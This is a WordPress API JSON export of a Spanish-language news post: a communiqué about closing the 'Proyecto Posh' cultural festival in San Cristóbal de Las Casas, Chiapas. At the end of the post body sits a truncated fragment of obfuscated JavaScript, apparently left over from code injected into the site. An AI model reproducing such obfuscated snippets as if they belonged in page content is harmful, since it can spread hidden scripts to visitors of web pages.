{"id":19157,"date":"2024-12-03T04:28:28","date_gmt":"2024-12-03T04:28:28","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19157"},"modified":"2024-12-03T04:28:29","modified_gmt":"2024-12-03T04:28:29","slug":"fue-un-gusto-haber-clausurado-el-festival-internacional-de-expresiones-culturales-de-la-nueva-generacion-proyecto-posh-que-inicio-el-pasado-14-de-noviembre","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19157","title":{"rendered":"Fue un gusto haber clausurado el Festival Internacional de Expresiones Culturales de La Nueva Generaci\u00f3n &#8221; Proyecto Posh &#8220;, que inici\u00f3 el pasado 14 de noviembre"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/IMG-20241202-WA0020-1024x683.jpg\" alt=\"\" class=\"wp-image-19158\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/IMG-20241202-WA0020-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/IMG-20241202-WA0020-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/IMG-20241202-WA0020-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/IMG-20241202-WA0020.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Comunicado \/ 18 noviembre del 2024<\/p>\n\n\n\n<p>Este evento, organizado por mi querida amiga Leticia Lescieur , tiene como prop\u00f3sito impulsar a los talentosos artistas sancristobalenses, d\u00e1ndoles el espacio que merecen para brillar.<br>Es fundamental que San Crist\u00f3bal de Las Casas recupere su t\u00edtulo de Capital Cultural de Chiapas&#8221;, un reconocimiento que por a\u00f1os ha distinguido a nuestra ciudad y que seguiremos trabajando por ello.<br>El cierre del festival fue una velada maravillosa, con la presentaci\u00f3n del talentoso Carlos Mac\u00edas, un cantautor chiapaneco que, con su m\u00fasica, nos record\u00f3 la importancia de la cultura y el arte en nuestras vidas. ?<br>\u00a1Gracias a todos los que hicieron posible este evento y a todos los que participaron! Sigamos trabajando juntos para que San Crist\u00f3bal siga brillando como la cuna de la cultura y el arte en Chiapas.<\/p>\n\n\n\n<p>Eduardo Ram\u00edrez<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Comunicado \/ 18 noviembre del 2024 Este evento, organizado por mi querida amiga Leticia Lescieur , tiene como prop\u00f3sito impulsar a los talentosos artistas sancristobalenses, d\u00e1ndoles el espacio que merecen para brillar.Es fundamental que San Crist\u00f3bal de Las Casas recupere su t\u00edtulo de Capital Cultural de Chiapas&#8221;, un reconocimiento que por a\u00f1os ha distinguido a &hellip;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-19157","post","type-post","status-publish","format-standard","","category-sin-categoria"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19157","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19157"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19157\/revisions"}],"predecessor-version":[{"id":19159,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19157\/revisions\/19159"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19157"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19157"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19157"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}